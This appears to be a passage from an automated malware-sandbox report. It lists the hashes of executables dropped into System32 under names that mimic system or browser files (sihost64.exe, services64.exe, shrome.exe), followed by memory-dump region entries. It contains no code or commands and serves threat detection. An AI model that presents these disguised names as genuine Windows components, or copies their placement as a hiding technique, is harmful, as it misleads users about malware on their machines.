
SHA512
7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe
MD5
9eb9be816f6263b25bee3aa6038f58f9

SHA1
6c3ddf1e31c349515ea2bb7e417e888077bcdfec

SHA256
eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e

SHA512
441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff

Download Submit
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
MD5
cceaed462cd04bcc64c90e5d0f11df59

SHA1
7a1b253f70f7b30decac1098245431459d8e96b5

SHA256
a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682

SHA512
3df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9

Download Submit
C:\Windows\System32\services64.exe
MD5
342ef4f2941187bdc7f66d148be0ff75

SHA1
7ff601a24c42ec01ef62c097927688a431c5aa76

SHA256
046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

SHA512
84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

Download Submit
C:\Windows\System32\shrome.exe
MD5
fa409741e16094bb8bc373d7b46742cd

SHA1
e082dd13c52fe7fb65fac801d2588e0c9153d9cc

SHA256
c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

SHA512
7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

Download Submit
C:\Windows\system32\Microsoft\Libs\sihost64.exe
MD5
9eb9be816f6263b25bee3aa6038f58f9

SHA1
6c3ddf1e31c349515ea2bb7e417e888077bcdfec

SHA256
eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e

SHA512
441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff

Download Submit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
MD5
cceaed462cd04bcc64c90e5d0f11df59

SHA1
7a1b253f70f7b30decac1098245431459d8e96b5

SHA256
a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682

SHA512
3df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9

Download Submit
C:\Windows\system32\services64.exe
MD5
342ef4f2941187bdc7f66d148be0ff75

SHA1
7ff601a24c42ec01ef62c097927688a431c5aa76

SHA256
046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

SHA512
84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

Download Submit
C:\Windows\system32\shrome.exe
MD5
fa409741e16094bb8bc373d7b46742cd

SHA1
e082dd13c52fe7fb65fac801d2588e0c9153d9cc

SHA256
c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

SHA512
7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

Download Submit
memory/396-912-0x0000029E45083000-0x0000029E45085000-memory.dmp

Filesize
8KB

Download
memory/396-910-0x0000029E45080000-0x0000029E45082000-memory.dmp

Filesize
8KB

Download
memory/396-915-0x0000029E45086000-0x0000029E45087000-memory.dmp

Filesize
4KB

Download
memory/688-776-0x0000028E3C693000-0x0000028E3C695000-memory.dmp

Filesize
8KB

Download
memory/688-775-0x0000028E3C690000-0x0000028E3C692000-memory.dmp

Filesize
8KB

Download
memory/688-777-0x0000028E3C696000-0x0000028E3C698000-memory.dmp

Filesize
8KB

Download
memory/688-753-0x0000000000000000-mapping.dmp

Download
memory/688-805-0x0000028E3C698000-0x0000028E3C69A000-memory.dmp

Filesize
8KB

Download
memory/796-899-0x0000000000000000-mapping.dmp

Download
memory/1064-768-0x0000000000000000-mapping.dmp

Download
memory/1140-1034-0x0000021541EC3000-0x0000021541EC5000-memory.dmp

Filesize
8KB

Download
memory/1140-1035-0x0000021541EC6000-0x0000021541EC7000-memory.dmp

Filesize
4KB

Download
memory/1140-1028-0x00000215403D0000-0x00000215403D6000-memory.dmp

Filesize
24KB

Download
memory/1140-1030-0x0000021541EC0000-0x0000021541EC2000-memory.dmp

Filesize
8KB

Download
memory/1672-874-0x0000000000000000-mapping.dmp

Download
memory/1752-827-0x0000000000000000-mapping.dmp

Download
memory/1784-656-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

Filesize
4KB

Download
memory/1784-657-0x0000000004EF2000-0x0000000004EF3000-memory.dmp

Filesize
4KB

Download
memory/1784-676-0x0000000004EF3000-0x0000000004EF4000-memory.dmp

Filesize
4KB

Download
memory/1784-648-0x0000000000000000-mapping.dmp

Download
memory/1812-954-0x000001AFB3F70000-0x000001AFB3F72000-memory.dmp

Filesize
8KB

Download
memory/1812-958-0x000001AFB3F76000-0x000001AFB3F77000-memory.dmp

Filesize
4KB

Download
memory/1812-956-0x000001AFB3F73000-0x000001AFB3F75000-memory.dmp

Filesize
8KB

Download
memory/2156-774-0x0000012E1C876000-0x0000012E1C877000-memory.dmp

Filesize
4KB

Download
memory/2156-773-0x0000012E1C873000-0x0000012E1C875000-memory.dmp

Filesize
8KB

Download
memory/2156-772-0x0000012E1C870000-0x0000012E1C872000-memory.dmp

Filesize
8KB

Download
memory/2156-742-0x0000012E1C3B0000-0x0000012E1C5A1000-memory.dmp

Filesize
1.9MB

Download
memory/2172-115-0x0000000000000000-mapping.dmp

Download
memory/2252-807-0x00000187F4780000-0x00000187F498C000-memory.dmp

Filesize
2.0MB

Download
memory/2252-811-0x00000187F70B3000-0x00000187F70B5000-memory.dmp

Filesize
8KB

Download
memory/2252-809-0x00000187F70B0000-0x00000187F70B2000-memory.dmp

Filesize
8KB

Download
memory/2252-813-0x00000187F70B6000-0x00000187F70B7000-memory.dmp

Filesize
4KB

Download
memory/2304-690-0x0000000006B00000-0x0000000006B01000-memory.dmp

Filesize
4KB

Download
memory/2304-719-0x0000000006B03000-0x0000000006B04000-memory.dmp

Filesize
4KB

Download
memory/2304-678-0x0000000000000000-mapping.dmp

Download
memory/2304-691-0x0000000006B02000-0x0000000006B03000-memory.dmp

Filesize
4KB

Download
memory/2504-471-0x000000007E5C0000-0x000000007E5C1000-memory.dmp

Filesize
4KB

Download
memory/2504-376-0x0000000004792000-0x0000000004793000-memory.dmp

Filesize
4KB

Download
memory/2504-375-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/2504-366-0x0000000000000000-mapping.dmp

Download
memory/2504-472-0x0000000004793000-0x0000000004794000-memory.dmp

Filesize
4KB

Download
memory/2920-949-0x000002196DC68000-0x000002196DC6A000-memory.dmp

Filesize
8KB

Download
memory/2920-916-0x000002196DC60000-0x000002196DC62000-memory.dmp

Filesize
8KB

Download
memory/2920-887-0x0000000000000000-mapping.dmp

Download
memory/2920-920-0x000002196DC66000-0x000002196DC68000-memory.dmp

Filesize
8KB

Download
memory/2920-918-0x000002196DC63000-0x000002196DC65000-memory.dmp

Filesize
8KB

Download
memory/2948-871-0x0000000000000000-mapping.dmp

Download
memory/2948-706-0x0000000000000000-mapping.dmp

Download
memory/2988-1036-0x0000022BB0090000-0x0000022BB00B0000-memory.dmp

Filesize
128KB

Download
memory/2988-1011-0x0000022BB0070000-0x0000022BB0090000-memory.dmp

Filesize
128KB

Download
memory/2988-987-0x00000001402F327C-mapping.dmp

Download
memory/2988-1037-0x0000022BB00B0000-0x0000022BB00D0000-memory.dmp

Filesize
128KB

Download
memory/2988-1001-0x0000000140000000-0x0000000140763000-memory.dmp

Filesize
7.4MB

Download
memory/3056-738-0x0000000000000000-mapping.dmp

Download
memory/3128-771-0x0000000000000000-mapping.dmp

Download
memory/3280-752-0x0000000000000000-mapping.dmp

Download
memory/3324-124-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download
memory/3324-120-0x0000000006BD0000-0x0000000006BD1000-memory.dmp

Filesize
4KB

Download
memory/3324-116-0x0000000000000000-mapping.dmp

Download
memory/3324-129-0x0000000007EF0000-0x0000000007EF1000-memory.dmp

Filesize
4KB

Download
memory/3324-128-0x0000000008070000-0x0000000008071000-memory.dmp

Filesize
4KB

Download
memory/3324-130-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/3324-127-0x0000000007120000-0x0000000007121000-memory.dmp

Filesize
4KB

Download
memory/3324-126-0x00000000079D0000-0x00000000079D1000-memory.dmp

Filesize
4KB

Download
memory/3324-137-0x0000000008DE0000-0x0000000008E13000-memory.dmp

Filesize
204KB

Download
memory/3324-125-0x0000000007040000-0x0000000007041000-memory.dmp

Filesize
4KB

Download
memory/3324-118-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/3324-144-0x0000000008300000-0x0000000008301000-memory.dmp

Filesize
4KB

Download
memory/3324-117-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/3324-149-0x0000000008F10000-0x0000000008F11000-memory.dmp

Filesize
4KB

Download
memory/3324-123-0x0000000006E30000-0x0000000006E31000-memory.dmp

Filesize
4KB

Download
memory/3324-122-0x0000000007210000-0x0000000007211000-memory.dmp

Filesize
4KB

Download
memory/3324-121-0x0000000006BD2000-0x0000000006BD3000-memory.dmp

Filesize
4KB

Download
memory/3324-152-0x00000000092F0000-0x00000000092F1000-memory.dmp

Filesize
4KB

Download
memory/3324-119-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/3324-150-0x000000007EB10000-0x000000007EB11000-memory.dmp

Filesize
4KB

Download
memory/3324-151-0x0000000006BD3000-0x0000000006BD4000-memory.dmp

Filesize
4KB

Download
memory/3428-868-0x0000000000000000-mapping.dmp

Download
memory/3472-830-0x0000000000000000-mapping.dmp

Download
memory/3500-886-0x0000000000000000-mapping.dmp

Download
memory/3508-721-0x0000000007260000-0x0000000007261000-memory.dmp

Filesize
4KB

Download
memory/3508-722-0x0000000007262000-0x0000000007263000-memory.dmp

Filesize
4KB

Download
memory/3508-709-0x0000000000000000-mapping.dmp

Download
memory/3508-741-0x0000000007263000-0x0000000007264000-memory.dmp

Filesize
4KB

Download
memory/3556-646-0x0000000007353000-0x0000000007354000-memory.dmp

Filesize
4KB

Download
memory/3556-628-0x0000000007352000-0x0000000007353000-memory.dmp

Filesize
4KB

Download
memory/3556-626-0x0000000007350000-0x0000000007351000-memory.dmp

Filesize
4KB

Download
memory/3556-618-0x0000000000000000-mapping.dmp

Download
memory/3624-971-0x0000000000000000-mapping.dmp

Download
memory/3720-940-0x0000000000000000-mapping.dmp

Download
memory/3720-959-0x0000018250783000-0x0000018250785000-memory.dmp

Filesize
8KB

Download
memory/3720-1010-0x0000018250788000-0x000001825078A000-memory.dmp

Filesize
8KB

Download
memory/3720-952-0x0000018250780000-0x0000018250782000-memory.dmp

Filesize
8KB

Download
memory/3720-1000-0x0000018250786000-0x0000018250788000-memory.dmp

Filesize
8KB

Download
memory/3724-864-0x0000000000000000-mapping.dmp

Download
memory/4004-863-0x000001EBF0D58000-0x000001EBF0D5A000-memory.dmp

Filesize
8KB

Download
memory/4004-842-0x000001EBF0D56000-0x000001EBF0D58000-memory.dmp

Filesize
8KB

Download
memory/4004-839-0x000001EBF0D53000-0x000001EBF0D55000-memory.dmp

Filesize
8KB

Download
memory/4004-838-0x000001EBF0D50000-0x000001EBF0D52000-memory.dmp

Filesize
8KB

Download
memory/4004-816-0x0000000000000000-mapping.dmp

Download
memory/4028-1021-0x0000019C462B0000-0x0000019C462B2000-memory.dmp

Filesize
8KB

Download
memory/4028-1023-0x0000019C462B6000-0x0000019C462B7000-memory.dmp

Filesize
4KB

Download
memory/4028-1022-0x0000019C462B3000-0x0000019C462B5000-memory.dmp

Filesize
8KB

Download
memory/4028-1013-0x0000019C2BD30000-0x0000019C2BD37000-memory.dmp

Filesize
28KB

Download